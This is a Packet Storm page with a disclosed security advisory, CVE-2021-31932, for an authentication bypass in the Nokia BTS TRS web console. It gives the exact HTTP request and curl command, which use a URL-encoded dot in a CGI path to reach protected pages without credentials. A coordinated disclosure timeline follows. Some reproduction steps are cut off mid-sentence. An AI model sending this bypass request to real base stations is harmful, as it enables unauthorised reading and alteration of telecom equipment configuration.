exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nokia Transport Module Authentication Bypass

Nokia Transport Module Authentication Bypass
Posted Feb 11, 2022
Authored by Cristiano Maruti

The TRS web console allows an authenticated user to remotely manage the BTS and its configuration. Analysis discovered an authentication bypass vulnerability in the web management console. BTS TRS web console version FTM_W20_FP2_2019.08.16_0010 is affected.

tags | exploit, web, bypass
advisories | CVE-2021-31932
SHA-256 | 0f05d6d716250f586c5ca2543716a3b108e48fdb98ec32ec187a2d7388c7a043

Nokia Transport Module Authentication Bypass

Change Mirror Download
  title: Nokia Transport Module Authentication Bypass
case id: CM-2020-02
product: BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)
vulnerability type: Authentication Bypass
severity: Critical
found: 2020-09-28
CVE: CVE-2021-31932
by: Cristiano Maruti (@cmaruti)


The TRS web console allows an authenticated user to remotely manage the BTS
and its configuration. The analysis discovered an authentication bypass
vulnerability (CWE-289) in the web management console. A malicious
unauthenticated user can get access to all the functionalities exposed via
the web panel circumventing the authentication process. The vulnerability
lies in the way the web server in use (lighttpd) protects restricted
resources and how special characters are encoded and pass to the underline
CGIs. A successful attack can read data from the BTS and read, modify or
delete BTS configuration.


The following version of the TRS web console was affected by the
vulnerability; previous versions may be vulnerable as well:
- BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)


It is possible to reproduce the vulnerability following these steps:
1. Open a web browser and insert the BTS TRS web console IP
2. Navigate to a protected resource (for example
3. Subsitute the dot character with the corresponding URL encoded value
4. Resulting URL
give access without prompt for any authentication credential

Below a full transcript of the HTTP request used to get access to a

HTTP Request
GET /protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken HTTP/1.1
Host: <targetip>
User-Agent: curl/7.67.0
Accept: */*

# curl -vk https://<targetip>/protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken&frame=showLogFile

Mitre assigned the following CVE ID to the vulnerability: CVE-2021-31932

2020-10-06: Contacting Nokia PSIRT and shared the details of the
2020-10-07: Nokia PSIRT acknowledge the receipt of the message.
2021-10-12: Vendor engineering team confirmed the vulnerability and working
on patch (estimated time end of 2020).
2021-04-30: Research requested a CVE assignment through MITRE CVE
Assignment Team; allocated CVE-2021-31932
2021-05-01: Researcher notified the assigned CVE number to the Vendor
2022-02-08: Researcher asked for permission to publicly release the report
to the public; Nokia PSIRT acknowledged
2022-02-10: Public release


Cristiano Maruti

Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    32 Files
  • 6
    Jun 6th
    39 Files
  • 7
    Jun 7th
    22 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By